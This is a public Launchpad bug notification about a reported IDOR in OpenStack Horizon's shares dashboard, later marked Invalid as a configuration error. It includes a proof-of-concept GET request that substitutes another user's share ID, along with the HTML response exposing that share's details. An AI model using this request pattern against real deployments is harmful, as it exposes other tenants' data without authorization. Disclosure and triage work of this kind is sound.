Given this has been over a year and a half the reporter acknowledged
they were fixing the configuration error in their environment, and they
haven't responded further to a request for update in that time, I'm
switching the report to public now.
** Information type changed from Private Security to Public
** Changed in: manila
Status: New => Invalid
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1861895
Title:
IDOR in /dashboard/project/shares/
Status in OpenStack Dashboard (Horizon):
Invalid
Status in OpenStack Shared File Systems Service (Manila):
Invalid
Status in manila-ui:
Invalid
Status in OpenStack Security Advisory:
Invalid
Bug description:
Hello, I believe, I found IDOR to some information about other user's
shares. Not sure if it's a Manila vulnerability, I cound't map this
horizon endpoint to the one on manila API, hope you can clarify things
for me.
Info:
When sending request to
/dashboard/project/shares/?action=row_update&table=shares&obj_id=<share_id> ,
an attacker can send other user's ID and disclose information in the response,
such as Name, Description, Size, Status, Visibility, Protocol, Share Network.
Request example, where 33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a is id of
the share which does not belong to me:
GET
/dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a
HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101
Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://<redacted>/dashboard/project/shares/
Cookie: <redacted>
Response example:
HTTP/1.1 200 OK
...
Content-Length: 3027
<tr class="ajax-update status_up" data-display="File_storage_3498"
data-display-key="name" data-object-id="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
data-update-interval="2500"
data-update-url="/dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
id="shares__row__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a">
<td class="multi_select_column"><div class="themable-checkbox"><input
class="table-row-multi-select" id="e7b9b987-e705-43aa-a605-f8d585e06768"
name="object_ids" type="checkbox" value="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
/><label for="e7b9b987-e705-43aa-a605-f8d585e06768"></label></div></td><td
class="word-break sortable anchor normal_column"><a
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/"
>File_storage_3498</a></td><td class="sortable normal_column">
1231
</td><td class="sortable normal_column"></td><td class="sortable
normal_column">
10GiB
</td><td class="status_up sortable normal_column">
Available
</td><td class="sortable normal_column">
private
</td><td class="sortable normal_column">
NFS
</td><td class="sortable normal_column">
File_storage_3498_network
</td><td class="actions_column"><div class="btn-group"><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_edit" class="btn
data-table-action btn-default btn-sm ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update/">
Edit Share</a><a class="btn btn-default btn-sm dropdown-toggle"
data-toggle="dropdown" href="#"><span class="fa fa-caret-down"></span></a><ul
class="dropdown-menu dropdown-menu-right row_actions"><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_extend_share"
class="btn data-table-action ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/extend/">
Extend Share</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_snapshots"
class="btn data-table-action ajax-modal btn-camera"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/create_snapshot/">
Create Snapshot</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_manage_rules"
class="btn data-table-action btn-edit"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/rules/">
Manage Rules</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_update_metadata"
class="btn data-table-action ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update_metadata/">
Edit Share Metadata</a></li><li><button data-batch-action="true"
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_delete"
class="data-table-action btn-danger btn" name="action" help_text="This action
cannot be undone." type="submit"
value="shares__delete__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"> Delete
Share</button></li></ul></div></td>
</tr>
To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1861895/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
